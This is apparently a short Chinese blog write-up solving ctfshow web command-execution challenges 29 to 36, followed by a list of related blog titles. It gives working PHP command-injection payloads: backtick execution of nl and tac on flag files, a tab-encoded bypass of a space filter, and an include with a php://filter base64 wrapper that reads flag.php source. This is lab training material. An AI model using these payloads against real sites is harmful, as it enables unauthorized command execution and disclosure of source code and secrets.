ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
黑客老陈2 分钟前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
张暮笛3 分钟前
抓取手机HCI日志
linux
大猫和小黄5 分钟前
Windows、CentOS环境下搭建自己的版本管理资料库:GitBlit
linux·服务器·windows·git
Joyner20189 分钟前
【Linux】ubuntu通过远程命令行启动桌面应用
linux·服务器·ubuntu
ghostwritten12 分钟前
Linux Swap: 深入解析 mkswap, mkfs.swap, 和 swapon
linux·运维·服务器
我是唐青枫14 分钟前
Linux xargs 命令使用教程
linux·运维·服务器
gallonyin14 分钟前
【监控】夜莺监控系统各环节资源压力分析
运维·服务器
未知陨落1 小时前
Linux常用命令
linux·运维·服务器
chian-ocean1 小时前
Linux内核调度优先级详解:如何优化你的系统性能
linux·运维·服务器
小扳2 小时前
微服务篇-深入了解 MinIO 文件服务器(你还在使用阿里云 0SS 对象存储图片服务?教你使用 MinIO 文件服务器:实现从部署到具体使用)
java·服务器·分布式·微服务·云原生·架构